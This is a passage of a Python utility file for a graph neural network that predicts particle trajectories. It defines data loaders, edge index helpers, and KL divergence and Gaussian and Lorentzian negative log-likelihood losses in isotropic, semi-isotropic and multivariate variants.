valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
def to_2d_idx(idx, num_cols):
idx = np.array(idx, dtype=np.int64)
y_idx = np.array(np.floor(idx / float(num_cols)), dtype=np.int64)
x_idx = idx % num_cols
return x_idx, y_idx
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def get_triu_indices(num_nodes):
"""Linear triu (upper triangular) indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
triu_indices = (ones.triu() - eye).nonzero().t()
triu_indices = triu_indices[0] * num_nodes + triu_indices[1]
return triu_indices
def get_tril_indices(num_nodes):
"""Linear tril (lower triangular) indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
tril_indices = (ones.tril() - eye).nonzero().t()
tril_indices = tril_indices[0] * num_nodes + tril_indices[1]
return tril_indices
def get_offdiag_indices(num_nodes):
"""Linear off-diagonal indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
offdiag_indices = (ones - eye).nonzero().t()
offdiag_indices = offdiag_indices[0] * num_nodes + offdiag_indices[1]
return offdiag_indices
def get_triu_offdiag_indices(num_nodes):
"""Linear triu (upper) indices w.r.t. vector of off-diagonal elements."""
triu_idx = torch.zeros(num_nodes * num_nodes)
triu_idx[get_triu_indices(num_nodes)] = 1.
triu_idx = triu_idx[get_offdiag_indices(num_nodes)]
return triu_idx.nonzero()
def get_tril_offdiag_indices(num_nodes):
"""Linear tril (lower) indices w.r.t. vector of off-diagonal elements."""
tril_idx = torch.zeros(num_nodes * num_nodes)
tril_idx[get_tril_indices(num_nodes)] = 1.
tril_idx = tril_idx[get_offdiag_indices(num_nodes)]
return tril_idx.nonzero()
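# Worked example (added for illustration) for num_nodes=3: the six
# off-diagonal entries of a 3x3 matrix, flattened row-major, sit at linear
# indices [1, 2, 3, 5, 6, 7]; the triu/tril helpers then index into that
# 6-vector of off-diagonal elements.
def _demo_offdiag_indices():
    assert get_offdiag_indices(3).tolist() == [1, 2, 3, 5, 6, 7]
    assert get_triu_offdiag_indices(3).view(-1).tolist() == [0, 1, 3]
    assert get_tril_offdiag_indices(3).view(-1).tolist() == [2, 4, 5]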
def get_minimum_distance(data):
data = data[:, :, :, :2].transpose(1, 2)
data_norm = (data ** 2).sum(-1, keepdim=True)
dist = data_norm + \
data_norm.transpose(2, 3) - \
2 * torch.matmul(data, data.transpose(2, 3))
min_dist, _ = dist.min(1)
return min_dist.view(min_dist.size(0), -1)
def get_buckets(dist, num_buckets):
dist = dist.cpu().data.numpy()
min_dist = np.min(dist)
max_dist = np.max(dist)
bucket_size = (max_dist - min_dist) / num_buckets
thresholds = bucket_size * np.arange(num_buckets)
bucket_idx = []
for i in range(num_buckets):
if i < num_buckets - 1:
idx = np.where(np.all(np.vstack((dist > thresholds[i],
dist <= thresholds[i + 1])), 0))[0]
else:
idx = np.where(dist > thresholds[i])[0]
bucket_idx.append(idx)
return bucket_idx, thresholds
def get_correct_per_bucket(bucket_idx, pred, target):
pred = pred.cpu().numpy()[:, 0]
target = target.cpu().data.numpy()
correct_per_bucket = []
for i in range(len(bucket_idx)):
preds_bucket = pred[bucket_idx[i]]
target_bucket = target[bucket_idx[i]]
correct_bucket = np.sum(preds_bucket == target_bucket)
correct_per_bucket.append(correct_bucket)
return correct_per_bucket
def get_correct_per_bucket_(bucket_idx, pred, target):
pred = pred.cpu().numpy()
target = target.cpu().data.numpy()
correct_per_bucket = []
for i in range(len(bucket_idx)):
preds_bucket = pred[bucket_idx[i]]
target_bucket = target[bucket_idx[i]]
correct_bucket = np.sum(preds_bucket == target_bucket)
correct_per_bucket.append(correct_bucket)
return correct_per_bucket
def kl_categorical(preds, log_prior, num_atoms, eps=1e-16):
kl_div = preds * (torch.log(preds + eps) - log_prior)
return kl_div.sum() / (num_atoms * preds.size(0)) # normalisation here is (batch * num atoms)
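# Sanity check (added for illustration): when the predicted edge posterior
# equals the prior, the KL term vanishes.
def _demo_kl_categorical():
    preds = torch.ones(4, 20, 2) * 0.5          # [batch, edges, edge types]
    log_prior = torch.log(torch.ones(2) * 0.5)  # uniform prior over 2 types
    kl = kl_categorical(preds, log_prior, num_atoms=5)
    assert abs(float(kl)) < 1e-5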
def kl_categorical_uniform(preds, num_atoms, num_edge_types, add_const=False,
eps=1e-16):
kl_div = preds * torch.log(preds + eps)
if add_const:
const = np.log(num_edge_types)
kl_div += const
return kl_div.sum() / (num_atoms * preds.size(0))
def kl_categorical_uniform_var(preds, num_atoms, num_edge_types, add_const=False,
eps=1e-16):
kl_div = preds * torch.log(preds + eps)
if add_const:
const = np.log(num_edge_types)
kl_div += const
return (kl_div.sum(dim=1) / num_atoms).var()
def nll_gaussian(preds, target, variance, add_const=False):
"""
    loss function for a fixed-variance Gaussian (negative log-likelihood)
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param variance: fixed value for the variance of the Gaussian. Type float
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms)
"""
neg_log_p = ((preds - target) ** 2 / (2 * variance))
if add_const:
const = 0.5 * np.log(2 * np.pi * variance)
neg_log_p += const
return neg_log_p.sum() / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
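# Worked check (added for illustration): a constant error of 1.0 with
# variance 5e-5 contributes 1 / (2 * 5e-5) = 1e4 per element; summing over
# 10 timesteps and 4 feature dims and normalising by batch * num_atoms
# gives 10 * 4 * 1e4.
def _demo_nll_gaussian():
    preds = torch.ones(2, 5, 10, 4)   # [batch, atoms, timesteps, dims]
    target = torch.zeros(2, 5, 10, 4)
    nll = nll_gaussian(preds, target, variance=5e-5)
    assert abs(float(nll) - 10 * 4 * 1e4) < 1.0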
def nll_gaussian_var(preds, target, variance, add_const=False):
"""
returns the variance over the batch of the reconstruction loss
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param variance: fixed value for the variance of the Gaussian. Type float
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variance of the loss function
"""
neg_log_p = ((preds - target) ** 2 / (2 * variance))
if add_const:
const = 0.5 * np.log(2 * np.pi * variance)
neg_log_p += const
return (neg_log_p.sum(dim=1)/target.size(1)).var()
def nll_gaussian_variablesigma(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
Loss function for the case of variable sigma, with isotropic gaussian
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms)
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
neg_log_p = ((preds - target) ** 2 / (2 * variance))
# additional terms to add if we want to test how biasing helps
# biasing with sigmoid envelope
#+ 0.1* (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# biasing without envelope
# + 0.1 * ((preds-target) ** 2 + variance)
loss_1 = neg_log_p
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2*np.pi* variance))
neg_log_p = neg_log_p + const
loss_2 += const
return neg_log_p.sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)) , loss_2.sum() / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
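# The commented-out biasing terms above reference a sigmoid(epoch, midpoint,
# temperature) annealing envelope whose definition is not part of this
# excerpt. A plausible sketch, consistent with how it is used (rising from
# ~0 to ~1 around `midpoint` at a rate set by `temperature`), is below;
# this is an assumption, not the original definition.
def _sigmoid_envelope(epoch, midpoint, temperature):
    # hypothetical helper for illustration only
    return 1.0 / (1.0 + np.exp(-(epoch - midpoint) / temperature))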
def nll_gaussian_var__variablesigma(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
Loss function for the case of variable sigma, with isotropic gaussian
returns the variance over the batch of the reconstruction loss
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
    :return: variance of the loss function over the batch
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
neg_log_p = ((preds - target) ** 2 / (2 * variance))
# additional terms to add if we want to test how biasing helps
# + 0.1 * (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# np.exp(-epoch/temperature) *
#neg_log_p = ((preds - target) ** 2 / (2 * variance))- 0.0000001/ sigma
if add_const:
const = (0.5 * torch.log(2*np.pi* variance))
neg_log_p = neg_log_p + const
return (neg_log_p.sum(dim=1)/target.size(1)).var()
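# The semi-isotropic losses below call a `tile` helper to repeat the single
# per-(x,y) and per-(v_x,v_y) variance along the feature dimension. `tile`
# is defined elsewhere in this file, outside this excerpt; a minimal sketch
# of the behaviour the call sites rely on (an assumption, not the original
# implementation) is:
def _tile_sketch(tensor, dim, n_repeats):
    # repeat `tensor` n_repeats times along `dim`,
    # e.g. [B, N, T, 1] -> [B, N, T, n_repeats]
    return torch.cat([tensor] * n_repeats, dim=dim)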
def nll_gaussian_variablesigma_semiisotropic(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
    Loss function for the case of variable sigma, semi-isotropic: isotropic within (x,y) and within (v_x,v_y)
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, 2]- 1 is (x,y) and 1 is (v_x,v_y)
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms)
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
    # select the position and velocity components for 2D coords; for 3D the indices would be (0,1,2) for positions and (3,4,5) for velocities
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
indices_pos_var = torch.LongTensor([0])
indices_vel_var = torch.LongTensor([1])
if preds.is_cuda:
indices_pos, indices_vel, indices_pos_var, indices_vel_var = indices_pos.cuda(), indices_vel.cuda(), indices_pos_var.cuda(), indices_vel_var.cuda()
positions = torch.index_select(preds, 3, indices_pos)
velocities = torch.index_select(preds, 3, indices_vel)
pos_targets = torch.index_select(target, 3, indices_pos)
vel_targets = torch.index_select(target, 3, indices_vel)
pos_var = torch.index_select(variance, 3, indices_pos_var)
vel_var = torch.index_select(variance, 3, indices_vel_var)
    # broadcast the per-pair variances up to the full coordinate size
pos_var = tile(pos_var, 3, list(positions.size())[3])
vel_var = tile(vel_var, 3, list(velocities.size())[3])
# gets the value of the loss
neg_log_p = ((positions- pos_targets) ** 2 / (2 * pos_var)) + ((velocities - vel_targets) ** 2 / (2 * vel_var))
# additional terms to add if we want to test how biasing helps
# + 0.1* (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# np.exp(-epoch/temperature) *
# neg_log_p = ((preds - target) ** 2 / (2 * variance))- 0.0000001/ sigma
# determinant of the covariance matrix with diagonal terms
determinant = torch.prod(variance, 3).unsqueeze(3)
loss_1 = neg_log_p
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2*np.pi* determinant))
neg_log_p = neg_log_p + const
loss_2 += const
return neg_log_p.sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)) , loss_2.sum() / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
def nll_gaussian_var__variablesigma_semiisotropic(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
    Loss function for the case of variable sigma, semi-isotropic: isotropic within (x,y) and within (v_x,v_y)
returns the variance over the batch of the reconstruction loss
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, 2]- 1 is (x,y) and 1 is (v_x,v_y)
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
    :return: variance of the loss function over the batch
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
    # select the position and velocity components for 2D coords; for 3D the indices would be (0,1,2) for positions and (3,4,5) for velocities
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
indices_pos_var = torch.LongTensor([0])
indices_vel_var = torch.LongTensor([1])
if preds.is_cuda:
indices_pos, indices_vel, indices_pos_var, indices_vel_var = indices_pos.cuda(), indices_vel.cuda(), indices_pos_var.cuda(), indices_vel_var.cuda()
positions = torch.index_select(preds, 3, indices_pos)
velocities = torch.index_select(preds, 3, indices_vel)
pos_targets = torch.index_select(target, 3, indices_pos)
vel_targets = torch.index_select(target, 3, indices_vel)
pos_var = torch.index_select(variance, 3, indices_pos_var)
vel_var = torch.index_select(variance, 3, indices_vel_var)
    # broadcast the per-pair variances up to the full coordinate size
pos_var = tile(pos_var, 3, list(positions.size())[3])
vel_var = tile(vel_var, 3, list(velocities.size())[3])
# gets the value of the loss
neg_log_p = ((positions - pos_targets) ** 2 / (2 * pos_var)) + ((velocities - vel_targets) ** 2 / (2 * vel_var))
# additional terms to add if we want to test how biasing helps
# + 0.1* (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# np.exp(-epoch/temperature) *
# neg_log_p = ((preds - target) ** 2 / (2 * variance))- 0.0000001/ sigma
# determinant of the covariance matrix with diagonal terms
determinant = torch.prod(variance, 3).unsqueeze(3)
loss_1 = neg_log_p
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2 * np.pi * determinant))
neg_log_p = neg_log_p + const
loss_2 += const
return (neg_log_p.sum(dim=1)/target.size(1)).var()
def nll_lorentzian(preds, target, gamma):
"""
Isotropic lorentzian loss function
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param gamma: The tensor for the FWHM of the distribution of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:return: value of the loss function normalised by (batch * number of atoms)
"""
gammasquared = gamma ** 2
neg_log_p = torch.log(1+((preds - target) ** 2 / (gammasquared)))
neg_log_p += torch.log(gamma)
return neg_log_p.sum() / (target.size(0) * target.size(1))
def nll_lorentzian_var(preds, target, gamma):
"""
Isotropic lorentzian loss function
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param gamma: The tensor for the FWHM of the distribution of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:return: variance of the loss function normalised by (batch * number of atoms)
"""
gammasquared = gamma ** 2
neg_log_p = torch.log(1+((preds - target) ** 2 / (gammasquared)))
neg_log_p += torch.log(gamma)
return (neg_log_p.sum(dim=1)/target.size(1)).var()
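# Illustrative check (added for clarity): for a unit error with gamma = 1 the
# per-element Lorentzian NLL is log(1 + 1) + log(1) = log 2; note the
# logarithmic (heavy-tailed) growth in the error, versus the quadratic
# growth of the Gaussian losses above.
def _demo_nll_lorentzian():
    preds = torch.ones(1, 2, 1, 1)
    target = torch.zeros(1, 2, 1, 1)
    gamma = torch.ones(1, 2, 1, 1)
    assert abs(float(nll_lorentzian(preds, target, gamma)) - np.log(2)) < 1e-5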
def nll_gaussian_multivariatesigma_efficient(preds, target, sigma, accel, vel, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms), value for loss of each term
"""
# get normalised vectors for acceleration and velocities v|| and a||
# t = time.time()
velnorm = vel.norm(p=2, dim = 3, keepdim = True)
normalisedvel = vel.div(velnorm.expand_as(vel))
    # zero-speed rows give NaN after normalisation; replace them with the isotropic unit vector (1/sqrt(2), 1/sqrt(2)), since the direction is then arbitrary (done here for efficiency)
normalisedvel[torch.isnan(normalisedvel)] = np.power(1/2, 1/2)
accelnorm = accel.norm(p=2, dim = 3, keepdim = True)
normalisedaccel = accel.div(accelnorm.expand_as(accel))
normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# print('extractdata: {:.1f}s'.format(time.time() - t))
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# tim = time.time()
# velperp = torch.zeros(normalisedvel.size()[0], normalisedvel.size()[1], normalisedvel.size()[2], normalisedvel.size()[3])
# accelperp = torch.zeros(accelnorm.size()[0], accelnorm.size()[1], accelnorm.size()[2], normalisedvel.size()[3])
# for i in range(normalisedvel.size()[0]):
# for j in range(normalisedvel[i].size()[0]):
# for k in range(normalisedvel[i][j].size()[0]):
# velperp[i][j][k][0] = -normalisedvel[i][j][k][1]
# velperp[i][j][k][1] = normalisedvel[i][j][k][0]
# accelperp[i][j][k][0] = -normalisedaccel[i][j][k][1]
# accelperp[i][j][k][1] = normalisedaccel[i][j][k][0]
# if preds.is_cuda:
# velperp, accelperp = velperp.cuda(), accelperp.cuda()
# print('getperp: {:.1f}s'.format(time.time() - tim))
    # need the covariance Sigma = diag(sigma^2), its inverse and det(Sigma)
# ti = time.time()
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds-target
indices_pos = torch.LongTensor([0,1])
indices_vel = torch.LongTensor([2,3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4)# (x-mu)
# print('getdifferences: {:.1f}s'.format(time.time() - ti))
# the matrix multiplication for multivariate case can be thought of as taking a projection of the error vector
# along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2 along that
# direction. This follows directly from the fact the rotation matrix is orthogonal.
# multime = time.time()
# surprisingly it is more efficient to calculate the perpendicular term by considering
# (position_differences - (position_differences.v||)v||).vperp to get the position differences in the perpendicular
# direction than using rotation (x,y) -> (-y,x) as the triple for loop is inefficient. about 100x faster this way
# and almost as fast as isotropic
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim = 3, keepdim = True)
    # NaN can occur when dividing by 0 (see comment below), but replacing NaN after the
    # division does not help: the NaN survives in the graph being backpropagated through
    # and produces NaN gradients on the second pass of the function. Clamping the zeros
    # before the division avoids this issue.
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN can occur when perpterm is 0; this means that preds-true = ((preds-true).v||) v||,
    # i.e. the error is entirely in the parallel direction with no perpendicular error, so these terms are set to 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
# gets the error vectors
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
if (torch.min(perpnorm) < pow(10, -7)):
accuracy = np.full((perpnorm.size(0), perpnorm.size(1), perpnorm.size(2), perpnorm.size(3)),
pow(10, -7), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
perpnorm = torch.max(perpnorm, accuracy)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
    # NaN when preds-target lies entirely along the v-parallel direction, meaning the error
    # in the perpendicular direction is 0
# normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
# errorvectorperptoa = torch.matmul(accelperp.unsqueeze(3), velocity_differences).squeeze()
indices_vpar = torch.LongTensor([0])
indices_vperp = torch.LongTensor([1])
indices_apar = torch.LongTensor([2])
indices_aperp = torch.LongTensor([3])
#print('matrixmult: {:.1f}s'.format(time.time() - multime))
if preds.is_cuda:
indices_vpar, indices_vperp, indices_apar, indices_aperp = indices_vpar.cuda(), indices_vperp.cuda(), indices_apar.cuda(), indices_aperp.cuda()
# t = time.time()
# gets the loss components
losscomponentparalleltov = (errorvectorparalleltov ** 2) * torch.index_select(inversevariance, 3, indices_vpar).squeeze()
losscomponentperptov = (errorvectorperptov ** 2) * torch.index_select(inversevariance, 3, indices_vperp).squeeze()
losscomponentparalleltoa = (errorvectorparalleltoa ** 2) * torch.index_select(inversevariance, 3, indices_apar).squeeze()
losscomponentperptoa = (errorvectorperptoa ** 2) * torch.index_select(inversevariance, 3, indices_aperp).squeeze()
neg_log_loss = losscomponentparalleltov + losscomponentperptov + losscomponentparalleltoa + losscomponentperptoa
loss_1 = neg_log_loss
loss_2 = 0.0
# print('getlosscomponents: {:.1f}s'.format(time.time() - t))
if add_const:
        const = 0.5 * torch.log(2 * np.pi * determinant)
neg_log_loss += const.squeeze()
loss_2 += const.squeeze()
    return (neg_log_loss).sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)), loss_2 / (target.size(0) * target.size(1))  # normalisation here is (batch * num atoms)
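# Illustrative usage sketch for the multivariate NLL losses in this file (shapes follow the docstrings;
# batch/atoms/steps and the random tensors are placeholders, not real data):
#   preds  = torch.randn(batch, atoms, steps, 4)   # (x, y, v_x, v_y)
#   target = torch.randn(batch, atoms, steps, 4)
#   sigma  = torch.rand(batch, atoms, steps, 4) + 0.1
#   vel    = torch.randn(batch, atoms, steps, 2)
#   accel  = torch.randn(batch, atoms, steps, 2)
#   batch_var = nll_gaussian_var_multivariatesigma_efficient(preds, target, sigma, accel, vel)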
def nll_gaussian_var_multivariatesigma_efficient(preds, target, sigma, accel, vel, add_const=True):
"""
Loss function for the case of variable sigma multivariate normal case
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param accel: gives direction of acceleration of each prediction data point. Size [batch, particles, timesteps, 2]
:param vel: gives direction of velocity of each prediction data point. Size [batch, particles, timesteps, 2]
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variance of the loss function
"""
# get normalised vectors for acceleration and velocities v|| and a||
velnorm = vel.norm(p=2, dim=3, keepdim=True)
normalisedvel = vel.div(velnorm.expand_as(vel))
normalisedvel[torch.isnan(normalisedvel)] = np.power(1 / 2, 1 / 2)
    accelnorm = accel.norm(p=2, dim=3, keepdim=True)
    normalisedaccel = accel.div(accelnorm.expand_as(accel))
    normalisedaccel[torch.isnan(normalisedaccel)] = np.power(1 / 2, 1 / 2)
# get perpendicular components to the accelerations and velocities accelperp, velperp
# # note in 2D perpendicular vector is just rotation by pi/2 about origin (x,y) -> (-y,x)
# velperp = torch.zeros(normalisedvel.size()[0], normalisedvel.size()[1], normalisedvel.size()[2],
# normalisedvel.size()[3])
# accelperp = torch.zeros(accelnorm.size()[0], accelnorm.size()[1], accelnorm.size()[2], normalisedvel.size()[3])
# for i in range(normalisedvel.size()[0]):
# for j in range(normalisedvel[i].size()[0]):
# for k in range(normalisedvel[i][j].size()[0]):
# velperp[i][j][k][0] = -normalisedvel[i][j][k][1]
# velperp[i][j][k][1] = normalisedvel[i][j][k][0]
# accelperp[i][j][k][0] = -normalisedaccel[i][j][k][1]
# accelperp[i][j][k][1] = normalisedaccel[i][j][k][0]
# if preds.is_cuda:
# velperp, accelperp = velperp.cuda(), accelperp.cuda()
# need Sigma=Sigma^2, Sigma^-2 and det(Sigma)
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
determinant = torch.prod(variance, 3).unsqueeze(3)
inversevariance = variance ** -1
# need position and velocity differences in (x,y) coordinates
differences = preds - target
indices_pos = torch.LongTensor([0, 1])
indices_vel = torch.LongTensor([2, 3])
if preds.is_cuda:
indices_pos, indices_vel = indices_pos.cuda(), indices_vel.cuda()
position_differences = torch.index_select(differences, 3, indices_pos)
velocity_differences = torch.index_select(differences, 3, indices_vel)
position_differences = position_differences.unsqueeze(4)
velocity_differences = velocity_differences.unsqueeze(4) # (x-mu)
    # the matrix multiplication for the multivariate case can be thought of as taking a projection of the error
    # vector along the parallel and perpendicular velocity/acceleration directions and multiplying by 1/sigma^2
    # along that direction. This follows directly from the fact that the rotation matrix is orthogonal.
errorvectorparalleltov = torch.matmul(normalisedvel.unsqueeze(3), position_differences)
parallelterm = torch.matmul(normalisedvel.unsqueeze(4), errorvectorparalleltov)
perpterm = (position_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptov = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltov = errorvectorparalleltov.squeeze()
# errorvectorperptov = torch.matmul(velperp.unsqueeze(3), position_differences).squeeze()
errorvectorparalleltoa = torch.matmul(normalisedaccel.unsqueeze(3), velocity_differences)
parallelterm = torch.matmul(normalisedaccel.unsqueeze(4), errorvectorparalleltoa)
perpterm = (velocity_differences - parallelterm).squeeze()
perpnorm = perpterm.norm(p=2, dim=3, keepdim=True)
normalisedperp = perpterm.div(perpnorm.expand_as(perpterm))
normalisedperp[torch.isnan(normalisedperp)] = 0
errorvectorperptoa = torch.matmul(perpterm.unsqueeze(3), normalisedperp.unsqueeze(4)).squeeze()
errorvectorparalleltoa = errorvectorparalleltoa.squeeze()
indices_vpar = torch.LongTensor([0])
